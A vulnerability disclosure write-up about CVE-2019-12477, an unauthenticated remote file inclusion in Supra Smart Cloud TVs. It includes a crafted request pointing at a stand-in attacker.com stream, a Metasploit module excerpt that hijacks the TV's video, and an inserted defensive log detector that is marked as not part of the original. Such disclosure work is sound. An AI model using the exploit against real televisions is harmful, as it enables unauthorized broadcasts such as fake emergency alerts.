Hacking Smart TVs

Cognosec researchers identified multiple vulnerabilities in smart TVs. With the rise in the use of smart devices and the Internet of Things, publicly exposed devices have become a part of targeted attacks.

SUPRA is a Russian electronics brand that manufactures affordable audio-video equipment, household appliances and car electronics, most of which are distributed through Russian, Chinese and UAE-based e-commerce websites.

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a `/remote/media_control?action=setUri&uri=URI` request.

Technical Observation:
We are abusing `openLiveURL()`, which allows a local attacker to broadcast video on the Supra Smart Cloud TV. I found this vulnerability initially through source code review; then crawling the application and reading every request helped me trigger it.

To trigger the vulnerability, you can send a crafted request to the URL:

`http://[IPTV]/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8`

The URL above takes a video in .m3u8 format. We can use `curl -v -X GET` to send such a request; in essence, this is an unauthenticated remote file inclusion. An attacker could broadcast any video without any authentication; in the worst case, the attacker could leverage this vulnerability to broadcast a fake emergency message.
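A defender-side check for the request described above, as an added example that is not part of the original post: it scans HTTP request records for `setUri` calls to `/remote/media_control` and reports those whose stream host is not on an allowlist. The record format, the sample records and the allowlist are constructed assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample records in a hypothetical sensor format:
# "<timestamp> <client_ip> <tv_ip> <method> <request-target>"
SAMPLE_LOG = """\
2019-06-03T10:00:01Z 192.168.1.20 192.168.1.50 GET /remote/media_control?action=setUri&uri=http://iptv.provider.example/news.m3u8
2019-06-03T10:00:07Z 192.168.1.77 192.168.1.50 GET /remote/media_control?action=setUri&uri=http://198.51.100.9/alert.m3u8
2019-06-03T10:00:09Z 192.168.1.77 192.168.1.50 GET /remote/media_control?action=SETURI&uri=http%3A%2F%2F198.51.100.9%2Falert.m3u8
2019-06-03T10:00:12Z 192.168.1.20 192.168.1.50 GET /remote/status
2019-06-03T10:00:15Z 192.168.1.20 192.168.1.50 GET /remote/media_control?action=pause
malformed line
"""

# Assumption: the stream hosts this network legitimately uses.
ALLOWED_STREAM_HOSTS = {"iptv.provider.example"}


def find_stream_redirects(log_text, allowed_hosts=ALLOWED_STREAM_HOSTS):
    """Return setUri requests whose stream host is not on the allowlist."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split(maxsplit=4)
        if len(fields) != 5:
            continue  # skip records that do not match the assumed format
        timestamp, client, tv, _method, target = fields
        url = urlsplit(target)
        if url.path != "/remote/media_control":
            continue
        params = parse_qs(url.query)  # also decodes percent-encoded values
        action = params.get("action", [""])[0]
        stream = params.get("uri", [""])[0]
        if action.lower() != "seturi" or not stream:
            continue  # other actions (e.g. pause) do not change the stream
        host = (urlsplit(stream).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append({"time": timestamp, "client": client,
                             "tv": tv, "stream": stream, "host": host})
    return findings


if __name__ == "__main__":
    for f in find_stream_redirects(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} -> {f['tv']} set stream {f['stream']}")
```

Because the endpoint accepts the request without authentication, the client address in each finding is the only attribution available, so the check is most useful on a sensor that sees all traffic to the TV.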

The video PoC below shows a successful demonstration of this attack, in which Mr. Steve Jobs' speech is suddenly replaced with the attacker's fake “Emergency Alert Message”; this may make the end user panic.

After this, we converted the exploit into a Metasploit module, which broadcasts a video of Epic Sax Guy to the remote vulnerable TV.

```ruby
  # Excerpt from the module class; the class header and initialize are not shown.
  def run
    # Start the built-in HTTP server that will serve the playlist and segments
    start_service('Path' => '/')
    print_status("Broadcasting Epic Sax Guy to #{peer}")
    res = send_request_cgi(
      'method'        => 'GET',
      'uri'           => '/remote/media_control',
      'encode_params' => false,
      'vars_get'      => {
        'action'      => 'setUri',
        'uri'         => get_uri + 'epicsax.m3u8'
      }
    )
    unless res && res.code == 200 && res.body.include?('OK')
      print_error('No doo-doodoodoodoodoo-doo for you')
      return
    end
    # Sleep time calibrated using successful pcap
    print_good('Doo-doodoodoodoodoo-doo')
    print_status('Sleeping for 10s serving .m3u8 and .ts files...')
    sleep(10)
  end

  def on_request_uri(cli, request)
    dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')
    # Only these paths are served; anything else gets a 404
    files = {
      '/epicsax.m3u8' => 'application/x-mpegURL',
      '/epicsax0.ts'  => 'video/MP2T',
      '/epicsax1.ts'  => 'video/MP2T',
      '/epicsax2.ts'  => 'video/MP2T',
      '/epicsax3.ts'  => 'video/MP2T',
      '/epicsax4.ts'  => 'video/MP2T'
    }
    file = request.uri
    unless files.include?(file)
      vprint_error("Sending 404 for #{file}")
      return send_not_found(cli)
    end
    data = File.read(File.join(dir, file))
    vprint_good("Sending #{file}")
    send_response(cli, data, 'Content-Type' => files[file])
  end
end
```

The vulnerability is tracked as CVE-2019-12477, and this research was featured in Threatpost, The Hacker News and The Register.
